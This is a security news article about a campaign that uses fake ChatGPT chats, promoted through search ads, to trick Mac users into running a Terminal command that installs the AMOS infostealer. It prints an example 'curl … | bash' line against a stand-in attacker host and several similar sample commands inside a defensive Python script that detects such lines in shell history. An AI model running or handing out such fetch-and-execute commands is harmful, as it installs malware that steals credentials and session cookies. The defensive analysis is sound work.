Threat actors are exploiting the popularity of ChatGPT to distribute the AMOS infostealer to Mac users. The campaign is social engineering rather than a software exploit: a fake AI assistant, posing as a helpful troubleshooter for common technical problems, talks the victim into running a malicious command themselves. Security researchers note that this sidesteps defences built around suspicious downloads and installers, because the whole exchange looks like a routine support interaction on a platform the user trusts.
The attack begins when someone searches for a fix to a problem such as audio not working on their Mac. Sponsored links placed through Google Ads put what look like legitimate ChatGPT interfaces at the top of the results. Once the user starts a conversation with the fake chat, it hands over a seemingly innocuous "repair" command and instructs the user to paste it into the macOS Terminal application and run it.
The AMOS InfoStealer and Its Mac Device Exploitation
This approach marks a notable shift in malware distribution tactics. Instead of relying on fake installer windows or overt phishing pages, the attackers pair social engineering with execution through tools that ship with every Mac (curl and the shell), so no malicious installer has to be downloaded and opened. To the victim the interaction feels like a normal support session, which makes the malicious intent hard to spot. Kroll security researchers were the first to identify this campaign and its deployment of the AMOS InfoStealer on targeted Mac endpoints.
The attack is made more effective by the domain shown in the Google Ad, which looks legitimate enough that an average user has no reason to suspect it. The entire compromise requires a single copy-paste from the user into their terminal, a streamlined and efficient method for taking over a system.
The implications of a successful AMOS InfoStealer infection are severe for both individual users and organizations. This type of malware is specifically designed to exfiltrate sensitive data from Mac devices. This includes crucial information such as browser history, login credentials, active session cookies, and other stored secrets. The stolen data can then be exploited for various malicious purposes, including account takeovers, lateral movement within a compromised network, or being sold on dark web marketplaces.
Infection Mechanism and Malicious Command Execution
Kroll analysts pinpointed a specific terminal command, supplied by the simulated ChatGPT chat, as a key indicator of compromise on affected systems; it is worth hunting for in shell history files and process-creation telemetry. The command instructs macOS to download a script from a remote host and execute it immediately. In MITRE ATT&CK terms this maps to User Execution (T1204) and Ingress Tool Transfer (T1105).
A typical command observed in these attacks follows a pattern similar to this: curl -s https://attacker-example[.]com/installer.sh | bash. When the user runs this one-liner, curl fetches a shell script over HTTPS (the -s flag suppresses progress output) and pipes it straight into bash, which executes it in the same terminal session with the privileges of the logged-in user. Because the script is never written to disk, there is no file for a scanner to inspect after the fact. The downloaded script can then covertly deploy the AMOS malware, establish persistence on the system, and begin exfiltrating sensitive data. Anyone handed a command of this shape should refuse to run it blind; at minimum, fetch the script to a file and read it before executing anything.
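As an added example (not code from the article or from Kroll's report), the triage script below scans shell history lines for exactly this pipe-to-interpreter pattern and reports the downloader, the URL and the interpreter for each hit. It understands zsh's EXTENDED_HISTORY format (": <epoch>:<duration>;<command>") as well as plain bash history, ignores pipes inside quoted strings so that a pasted command discussed in an echo or a note is not flagged, and, going a step beyond the article's one-liner, also catches the command-substitution form bash -c "$(curl ...)" which has the same effect without a pipe character. The history lines, hostnames and timestamps are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Network fetchers, and interpreters that execute whatever is piped into them.
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "zsh", "ksh", "dash", "python", "python3", "osascript"}
WRAPPERS = {"sudo", "exec", "nohup", "env", "command"}  # skipped when locating the program
ENV_PREFIX = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")    # VAR=value prefixes, also skipped
# zsh with EXTENDED_HISTORY writes ": <epoch>:<duration>;<command>"; bash writes bare commands.
ZSH_EXT = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")
URL_RE = re.compile(r"https?://[^\s'\"|;&)]+")
SUBST_RE = re.compile(r"(?:\$\(|`)\s*(curl|wget)\b")    # bash -c "$(curl ...)" variant


@dataclass
class Finding:
    line_no: int                # 1-based line in the history file
    timestamp: Optional[int]    # epoch seconds if zsh recorded one, else None
    downloader: str
    url: Optional[str]
    interpreter: str
    command: str


def parse_history_line(line):
    """Return (timestamp, command) for a zsh extended or plain history line."""
    m = ZSH_EXT.match(line)
    return (int(m.group("ts")), m.group("cmd")) if m else (None, line)


def split_pipeline(cmd):
    """Split on unquoted single '|' ('||' is kept). Tracks ' and " quoting so a
    pipe inside a string literal is not a pipe; backslash escapes are not handled."""
    stages, buf, quote, i = [], [], None, 0
    while i < len(cmd):
        ch = cmd[i]
        if quote:                       # inside a quoted string
            buf.append(ch)
            quote = None if ch == quote else quote
        elif ch in ("'", '"'):
            quote = ch
            buf.append(ch)
        elif ch == "|" and cmd[i + 1:i + 2] == "|":
            buf.append("||")
            i += 1
        elif ch == "|":
            stages.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    stages.append("".join(buf).strip())
    return stages


def program_name(stage):
    """Basename of the program a stage runs, skipping sudo/env-style prefixes."""
    for word in stage.split():
        base = word.rsplit("/", 1)[-1]
        if base not in WRAPPERS and not ENV_PREFIX.match(word):
            return base
    return ""


def classify(cmd):
    """(downloader, url, interpreter) if cmd feeds a download into an interpreter, else None."""
    stages = split_pipeline(cmd)
    names = [program_name(s) for s in stages]
    for i, name in enumerate(names):                    # form 1: curl ... | bash
        if name in DOWNLOADERS:
            for j in range(i + 1, len(names)):
                if names[j] in INTERPRETERS:
                    u = URL_RE.search(stages[i])
                    return name, (u.group(0) if u else None), names[j]
    for stage, name in zip(stages, names):              # form 2: bash -c "$(curl ...)"
        m = SUBST_RE.search(stage) if name in INTERPRETERS else None
        if m:
            u = URL_RE.search(stage)
            return m.group(1), (u.group(0) if u else None), name
    return None


def scan_history(lines):
    """One Finding per history line that pipes a download into an interpreter."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if line.strip():
            ts, cmd = parse_history_line(line)
            hit = classify(cmd)
            if hit:
                findings.append(Finding(n, ts, *hit, cmd))
    return findings


# Constructed sample history (not real telemetry). Line 2 is the article's pattern; the
# others exercise negatives (download only, pipe without a shell, quoted text) and variants.
SAMPLE_HISTORY = [
    ": 1717000000:0;ls -la ~/Downloads",
    ": 1717000012:0;curl -s https://attacker-example[.]com/installer.sh | bash",
    ": 1717000030:0;curl -fsSL https://example.invalid/tool.sh -o tool.sh",
    ": 1717000045:0;brew install jq | tee install.log",
    "wget -qO- http://example.invalid/setup.sh | sudo sh",
    "echo 'curl -s https://example.invalid/x | bash' > notes.txt",
    ': 1717000090:0;bash -c "$(curl -fsSL https://example.invalid/i.sh)"',
]
```

On a real machine, call scan_history(open("/Users/<user>/.zsh_history", errors="replace")) for each user account (and .bash_history where it exists); the sample above yields hits on lines 2, 5 and 7 only. Shell history is best-effort evidence: it can be disabled or edited, so treat a hit as a starting point for process telemetry review rather than proof, and treat its absence as inconclusive.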
The ongoing development and adaptation of malware distribution techniques, particularly those that leverage widely trusted platforms like ChatGPT, highlight the ever-evolving threat landscape. Security professionals are closely monitoring the proliferation of such attacks and are advising users to exercise extreme caution when encountering unsolicited technical support or commands, especially when sourced through search engine advertisements.
The discovery of this campaign underscores the importance of robust cybersecurity practices, including user education and the implementation of advanced threat detection solutions. As attackers continue to find innovative ways to exploit user trust and popular technologies, staying informed and vigilant is crucial for safeguarding digital assets. Further analysis is expected to reveal the full scope of this AMOS InfoStealer campaign and the specific variants of the malware being deployed.

